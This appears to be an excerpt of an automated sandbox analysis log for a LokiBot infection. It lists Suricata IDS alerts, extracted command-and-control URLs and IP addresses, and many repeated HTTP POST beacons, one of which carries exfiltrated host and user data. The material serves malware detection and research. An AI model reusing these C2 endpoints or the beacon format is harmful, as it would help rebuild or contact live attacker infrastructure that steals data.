            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49961
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49995 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49951 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49995 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49889 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49945 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49889 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49951
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49942
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49995
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49889 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49889 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49945
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49937 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49937 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49937 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49976 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49976 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49976 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49889
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49937 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49937 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49976 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49976 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49976
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49937
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:50000
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Source: Malware configuration extractorURLs: 94.156.177.41/maxzi/five/fre.php
            Source: Joe Sandbox ViewIP Address: 94.156.177.41 94.156.177.41
            Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: closeData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 00 0a 00 00 00 01 00 00 00 01 00 30 00 00 00 46 00 44 00 44 00 34 00 32 00 45 00 45 00 31 00 38 00 38 00 45 00 39 00 33 00 31 00 34 00 33 00 37 00 46 00 34 00 46 00 42 00 45 00 32 00 43 00 Data Ascii: (ckav.rujones367706JONES-PC0FDD42EE188E931437F4FBE2C
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: global trafficHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 149Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: unknownTCP traffic detected without corresponding DNS query: 94.156.177.41
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
            Source: unknownHTTP traffic detected: POST /maxzi/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 9D963662Content-Length: 176Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 22 Nov 2024 16:38:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
